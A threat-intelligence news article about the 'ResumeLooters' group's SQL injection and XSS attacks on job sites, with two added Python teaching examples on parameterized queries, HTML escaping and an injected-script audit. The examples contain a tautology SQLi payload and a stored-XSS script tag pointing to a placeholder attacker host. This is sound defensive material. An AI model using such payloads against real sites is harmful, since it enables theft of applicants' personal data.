A threat group named ‘ResumeLooters’ used SQL injection and cross-site scripting (XSS) attacks to compromise 65 legitimate job and retail sites and steal the personal data of over 2 million job seekers.
The attackers focus primarily on the APAC region, targeting sites in Australia, Taiwan, China, Thailand, India, and Vietnam to collect job applicants’ names, email addresses, phone numbers, employment history, education, and other information.
According to Group-IB, which has been tracking the threat group since its inception, in November 2023, ResumeLooters attempted to sell the stolen data through Telegram channels.
Compromising legitimate sites
ResumeLooters relies mainly on SQL injection and XSS to break into its targets, primarily job search sites and retail stores.
The penetration testing phase included the use of open-source tools such as:
- sqlmap – Automates the detection and exploitation of SQL injection flaws and the takeover of database servers.
- Acunetix – A web vulnerability scanner that identifies common vulnerabilities such as XSS and SQL injection and provides remediation reports.
- BeEF framework – Exploits web browser vulnerabilities and assesses the target’s security posture via client-side vectors.
- X-Ray – Detects vulnerabilities in web applications and reveals their structure and potential weaknesses.
- Metasploit – Develops and executes exploit code against targets and is also used for security assessments.
- ARL (Asset Reconnaissance Lighthouse) – Scans and maps online assets to identify potential vulnerabilities in network infrastructure.
- dirsearch – A command-line tool that brute-forces directory and file names within web applications to reveal hidden resources.
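The SQL injection the article describes is the classic string-concatenation defect. The example below is added here and is not code from the article, from Group-IB, or from any affected site; it builds a constructed in-memory SQLite table of applicant records (the data and the `example.test` addresses are made up) and contrasts a concatenated lookup with a parameterized one. The parameterized version is both safe against a tautology such as `' OR '1'='1` and, as a side benefit, correct for legitimate values containing an apostrophe, which the concatenated query cannot even parse.

```python
import sqlite3

# Constructed sample rows for a job-board "applicants" table (not real records).
SAMPLE_APPLICANTS = [
    ("alice@example.test", "Alice Example", "555-0100"),
    ("bob@example.test", "Bob Example", "555-0101"),
    ("o'brien@example.test", "Seamus O'Brien", "555-0102"),
]


def build_db() -> sqlite3.Connection:
    """Create an in-memory database seeded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE applicants (email TEXT, name TEXT, phone TEXT)")
    conn.executemany("INSERT INTO applicants VALUES (?, ?, ?)", SAMPLE_APPLICANTS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, email: str) -> list:
    """Interpolates the value into the SQL text, so the value can change
    the shape of the query (the defect sqlmap-style tooling looks for)."""
    query = f"SELECT email, name, phone FROM applicants WHERE email = '{email}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, email: str) -> list:
    """Binds the value as a parameter; the database never parses it as SQL."""
    return conn.execute(
        "SELECT email, name, phone FROM applicants WHERE email = ?", (email,)
    ).fetchall()


def query_errors(lookup, conn: sqlite3.Connection, value: str) -> bool:
    """Return True if the given lookup raises a database error on this input."""
    try:
        lookup(conn, value)
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    tautology = "' OR '1'='1"
    print("vulnerable, tautology :", len(lookup_vulnerable(db, tautology)), "rows")
    print("safe, tautology       :", len(lookup_safe(db, tautology)), "rows")
    print("vulnerable, apostrophe:", "error" if query_errors(lookup_vulnerable, db, "o'brien@example.test") else "ok")
    print("safe, apostrophe      :", lookup_safe(db, "o'brien@example.test"))
```

The same principle applies to any driver: keep the query text constant and pass user-controlled values through the driver's placeholder mechanism rather than building the string yourself.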
After identifying and exploiting security weaknesses in the target site, ResumeLooters injects malicious script at numerous locations within the website’s HTML.
Some of these injections land where the browser executes them, while in other places, such as form elements and anchor tags, the injected script is simply displayed as text, as shown below.
Where the injection does execute, it loads a malicious remote script that displays a phishing form to steal visitor information.
Group-IB also observed cases where the attackers used custom techniques, such as creating fake employer profiles or posting fake resumes that contain XSS scripts.
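The fake-resume and fake-employer-profile technique is stored XSS: attacker-controlled text is saved by the site and later rendered into other users' pages. The example below is added here and is not code from the article, from Group-IB, or from any job site; it uses constructed profile data, a made-up `jobs.example.test` host for the site's own script, and an obviously placeholder `attacker-placeholder.invalid` host for the injected one. It shows a rendering function that interpolates profile fields raw beside one that HTML-escapes them, plus a small HTML audit that flags external scripts not on an allowlist, inline scripts, inline event handlers and `javascript:` URLs. Because the audit works on parsed tags, an escaped payload (the "simply displayed" case the article describes) produces no finding, while the same payload rendered raw does.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed profile fields as a job board might store them (not real data).
PROFILES = {
    "honest": {"name": "Alice Example", "headline": "Data analyst, 5 years"},
    "hostile": {
        "name": 'Bob <script src="https://attacker-placeholder.invalid/p.js"></script>',
        "headline": '<a href="#" onclick="run()">Contact me</a>',
    },
}

# The site's own page template; jobs.example.test is a made-up first-party host.
PAGE_TEMPLATE = (
    '<html><head><script src="https://jobs.example.test/app.js"></script></head>'
    "<body><h1>{name}</h1><p>{headline}</p></body></html>"
)


def render_vulnerable(profile: dict) -> str:
    """Interpolates stored fields into HTML unchanged: stored XSS."""
    return PAGE_TEMPLATE.format(**profile)


def render_safe(profile: dict) -> str:
    """HTML-escapes every field so markup in it is displayed, not executed."""
    return PAGE_TEMPLATE.format(**{k: html.escape(v) for k, v in profile.items()})


class InjectedScriptFinder(HTMLParser):
    """Collects script-execution vectors found in a page's parsed tags."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = set(allowed_hosts)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            src = attrs.get("src")
            if src:
                host = urlparse(src).hostname or ""
                if host not in self.allowed_hosts:
                    self.findings.append(("external-script", src))
            else:
                line, _ = self.getpos()
                self.findings.append(("inline-script", f"line {line}"))
        for name, value in attrs.items():
            if name.startswith("on"):
                self.findings.append(("event-handler", f"{tag}@{name}"))
            if name in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(("javascript-url", f"{tag}@{name}"))


def audit_page(page_html: str, allowed_hosts) -> list:
    """Return (kind, detail) findings for a rendered page."""
    finder = InjectedScriptFinder(allowed_hosts)
    finder.feed(page_html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    allow = ["jobs.example.test"]
    print("raw render   :", audit_page(render_vulnerable(PROFILES["hostile"]), allow))
    print("escaped render:", audit_page(render_safe(PROFILES["hostile"]), allow))
```

Escaping at render time is the primary control; the audit is a secondary check a site owner can run over stored records or crawled pages to spot injected script tags and handlers that have already made it into the HTML.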
Thanks to an opsec mistake by the attackers, Group-IB was able to gain access to the database hosting the stolen data, and it became clear that the attackers had established administrative access on some of the compromised sites.
ResumeLooters carries out these attacks for financial gain and has been linked to at least two Telegram accounts with Chinese names (Penetration Data Center and World Data Ali) used to try to sell the stolen data to other cybercriminals.
Although Group-IB has not conclusively confirmed the attackers' origin, ResumeLooters is a Chinese-speaking group that sells stolen data and uses Chinese versions of tools such as X-Ray, so it is highly likely to be based in China.